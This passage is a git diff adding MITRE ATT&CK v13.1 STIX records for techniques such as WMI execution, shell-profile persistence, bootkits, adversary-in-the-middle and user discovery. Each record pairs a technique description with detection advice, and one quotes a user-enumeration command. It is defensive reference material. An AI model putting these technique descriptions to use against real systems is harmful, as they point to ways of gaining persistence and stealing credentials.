@@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--1323325f-9452-40ef-91e2-35d3a688ac41", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-07T17:10:13.696Z", + "name": "Windows Management Instrumentation", + "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015)\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_contributors": [ + "@ionstorm" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of \"wmic\" and detect commands that are used to perform remote behavior. 
(Citation: FireEye WMI 2015)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Command: Command Execution", + "Network Traffic: Network Connection Creation" + ], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "id": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", + "created": "2017-05-31T21:30:44.329Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1047", + "external_id": "T1047" + }, + { + "source_name": "FireEye WMI 2015", + "description": "Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf" + }, + { + "source_name": "FireEye WMI SANS 2015", + "description": "Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf" + }, + { + "source_name": "MSDN WMI", + "description": "Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/aa394582.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--01df3350-ce05-4bdf-bdf8-0a919a66d4a8.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--01df3350-ce05-4bdf-bdf8-0a919a66d4a8.json new file mode 100644 index 0000000000000000000000000000000000000000..d295e8b00315300d6f4be66bccbb44e41fe8e144 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--01df3350-ce05-4bdf-bdf8-0a919a66d4a8.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--5f26a0ce-cd6b-4f47-8cf9-72b7214d48b2", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Robert Wilson", + "Katie & Tony Lambert", + "Joe Gervais" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--01df3350-ce05-4bdf-bdf8-0a919a66d4a8", + "type": "attack-pattern", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1156", + "url": "https://attack.mitre.org/techniques/T1156" + }, + { + "source_name": "intezer-kaiji-malware", + "url": "https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/", + "description": "Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware turning to Golang. Retrieved December 17, 2020." + } + ], + "modified": "2020-12-22T15:49:33.947Z", + "name": "Malicious Shell Modification", + "description": "Adversaries may establish persistence through executing malicious commands triggered by a user\u2019s shell. User shells execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command line interface or remotely logs in (such as SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user\u2019s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user\u2019s environment. 
When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. \n\nAdversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files (Citation: intezer-kaiji-malware). These files require root permissions and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile (Rocke) which are sourced when a user opens a command line interface or connects remotely. Adversaries often use ~/.bash_profile since the system only executes the first file that exists in the listed order. Adversaries have also leveraged the ~/.bashrc file (Tsunami, Rocke, Linux Rabbit, Magento) which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command line interface. Some malware targets the termination of a program to trigger execution (Cannon), adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session(Pearl_shellbot). \n\nFor macOS, the functionality of this technique is similar but leverages zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin. The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. 
For legacy programs, macOS executes /etc/bashrc on startup.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_detection": "While users may customize their shell profile files, there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\n\nMonitor for changes to /ect/profile and /etc/profile.d, these files should only be modified by system administrators. MacOS users can leverage Apple\u2019s Security Endpoint Framework using the ES_EVENT_TYPE_NOTIFY_WRITE(Citation: ESF_filemonitoring) function for monitoring these specific files. \n", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688.json new file mode 100644 index 0000000000000000000000000000000000000000..401ce6bad65322cd900291f164ead530405fb3aa --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688.json 
@@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--beca2ecb-60a5-4691-9b40-b84c18895482", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:39.967Z", + "name": "Screen Capture", + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_detection": "Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. 
The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", + "created": "2017-05-31T21:31:25.060Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1113", + "external_id": "T1113" + }, + { + "source_name": "CopyFromScreen .NET", + "description": "Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved March 24, 2020.", + "url": "https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8" + }, + { + "source_name": "Antiquated Mac Malware", + "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--02fefddc-fb1b-423f-a76b-7552dd211d4d.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--02fefddc-fb1b-423f-a76b-7552dd211d4d.json new file mode 100644 index 0000000000000000000000000000000000000000..61b704181bc85262350c6eb61f924b62a692ee63 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--02fefddc-fb1b-423f-a76b-7552dd211d4d.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--b5b11e21-4c2b-49d5-9b1e-dcf18ec73555", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--02fefddc-fb1b-423f-a76b-7552dd211d4d", + "type": "attack-pattern", + "created": "2017-05-31T21:30:54.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1067", + "url": "https://attack.mitre.org/techniques/T1067" + }, + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf", + "description": "Mandiant. (2016, February). M-Trends 2016. Retrieved January 4, 2017.", + "source_name": "MTrends 2016" + }, + { + "url": "http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion", + "description": "Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? (Infographic). Retrieved November 13, 2014.", + "source_name": "Lau 2011" + } + ], + "modified": "2020-03-20T19:53:25.628Z", + "name": "Bootkit", + "description": "A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016)\n\nAdversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\n### Master Boot Record\nThe MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. 
(Citation: Lau 2011)\n\n### Volume Boot Record\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_detection": "Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334.json new file mode 100644 index 0000000000000000000000000000000000000000..980b52b5f915d1b16977ca59d06392e4b293489c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--3a2cdfdb-6067-4be4-86dd-1294c7b16256", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:38.295Z", + "name": "Boot or Logon Initialization Scripts", + "description": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. \n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. \n\nAn adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. 
Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Windows", + "Linux" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [ + "File: File Creation", + "Active Directory: Active Directory Object Modification", + "Windows Registry: Windows Registry Key Creation", + "File: File Modification", + "Process: Process Creation", + "Command: Command Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", + "created": "2017-05-31T21:30:38.910Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1037", + "external_id": "T1037" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d.json new file mode 100644 index 0000000000000000000000000000000000000000..918fe2ecde335a8ec28320f9ae8af8e48d484fd8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d.json 
@@ -0,0 +1,104 @@ +{ + "type": "bundle", + "id": "bundle--81d34ebb-d5ee-48a2-ae11-59716c673405", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:37.568Z", + "name": "Adversary-in-the-Middle", + "description": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\n\nFor example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.(Citation: volexity_0day_sophos_FW) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)\n\nAdversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). 
Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Mayuresh Dani, Qualys", + "Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project", + "NEC" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor network traffic for anomalies associated with known AiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux", + "Network" + ], + "x_mitre_version": "2.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content", + "Service: Service Creation", + "Windows Registry: Windows Registry Key Modification", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", + "created": "2020-02-11T19:07:12.114Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1557", + "external_id": "T1557" + }, + { + "source_name": "dns_changer_trojans", + "description": "Abendan, O. (2012, June 14). How DNS Changer Trojans Direct Users to Threats. 
Retrieved October 28, 2021.", + "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/125/how-dns-changer-trojans-direct-users-to-threats" + }, + { + "source_name": "volexity_0day_sophos_FW", + "description": "Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.", + "url": "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/" + }, + { + "source_name": "taxonomy_downgrade_att_tls", + "description": "Alashwali, E. S., Rasmussen, K. (2019, January 26). What's in a Downgrade? A Taxonomy of Downgrade Attacks in the TLS Protocol and Application Protocols Using TLS. Retrieved December 7, 2021.", + "url": "https://arxiv.org/abs/1809.05681" + }, + { + "source_name": "ad_blocker_with_miner", + "description": "Kuzmenko, A.. (2021, March 10). Ad blocker with miner included. Retrieved October 28, 2021.", + "url": "https://securelist.com/ad-blocker-with-miner-included/101105/" + }, + { + "source_name": "mitm_tls_downgrade_att", + "description": "praetorian Editorial Team. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved December 8, 2021.", + "url": "https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/" + }, + { + "source_name": "Rapid7 MiTM Basics", + "description": "Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March 2, 2020.", + "url": "https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/" + }, + { + "source_name": "tlseminar_downgrade_att", + "description": "Team Cinnamon. (2017, February 3). Downgrade Attacks. Retrieved December 9, 2021.", + "url": "https://tlseminar.github.io/downgrade-attacks/" + }, + { + "source_name": "ttint_rat", + "description": "Tu, L. Ma, Y. Ye, G. (2020, October 1). Ttint: An IoT Remote Access Trojan spread through 2 0-day vulnerabilities. 
Retrieved October 28, 2021.", + "url": "https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104.json new file mode 100644 index 0000000000000000000000000000000000000000..c8b17a66b6b0248e478c1f929d1735dcd2bd32cc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104.json 
@@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--463ee45a-ef4c-439a-9a50-07465757e525", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-12T23:35:40.261Z", + "name": "System Owner/User Discovery", + "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. 
Environment variables, such as %USERNAME% and $USER, may also be used to access this information.\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_contributors": [ + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "`System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. 
Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nFor network infrastructure devices, collect AAA logging to monitor `show` commands being run by non-standard users from non-standard locations.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [ + "Process: OS API Execution", + "Process: Process Access", + "Windows Registry: Windows Registry Key Access", + "Active Directory: Active Directory Object Access", + "Network Traffic: Network Traffic Content", + "File: File Access", + "Process: Process Creation", + "Command: Command Execution", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "created": "2017-05-31T21:30:35.733Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1033", + "external_id": "T1033" + }, + { + "source_name": "show_ssh_users_cmd_cisco", + "description": "Cisco. (2023, March 7). Cisco IOS Security Command Reference: Commands S to Z . Retrieved July 13, 2022.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s5.html" + }, + { + "source_name": "US-CERT TA18-106A Network Infrastructure Devices 2018", + "description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. 
Retrieved October 19, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-106A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2.json new file mode 100644 index 0000000000000000000000000000000000000000..3556acc7d245f42b5498eced40e29d291c347b57 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2.json 
@@ -0,0 +1,80 @@ +{ + "type": "bundle", + "id": "bundle--a9415a33-da16-4694-ba0f-7d23a2414d08", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-02T21:34:46.139Z", + "name": "Acquire Infrastructure", + "description": "Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.\n\nUse of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090).(Citation: amnesty_nso_pegasus) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_detection": "Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. \n\nOnce adversaries have provisioned infrastructure (ex: a server for use in command and control), internet scans may help proactively discover adversary acquired infrastructure. 
Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_contributors": [ + "Shailesh Tiwary (Indian Army)" + ], + "x_mitre_data_sources": [ + "Internet Scan: Response Metadata", + "Domain Name: Active DNS", + "Internet Scan: Response Content", + "Domain Name: Domain Registration", + "Domain Name: Passive DNS" + ], + "type": "attack-pattern", + "id": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "created": "2020-09-30T16:37:40.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1583", + "external_id": "T1583" + }, + { + "source_name": "amnesty_nso_pegasus", + "description": "Amnesty International Security Lab. (2021, July 18). Forensic Methodology Report: How to catch NSO Group\u2019s Pegasus. Retrieved February 22, 2022.", + "url": "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/" + }, + { + "source_name": "Koczwara Beacon Hunting Sep 2021", + "description": "Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.", + "url": "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2" + }, + { + "source_name": "TrendmicroHideoutsLease", + "description": "Max Goncharov. (2015, July 15). 
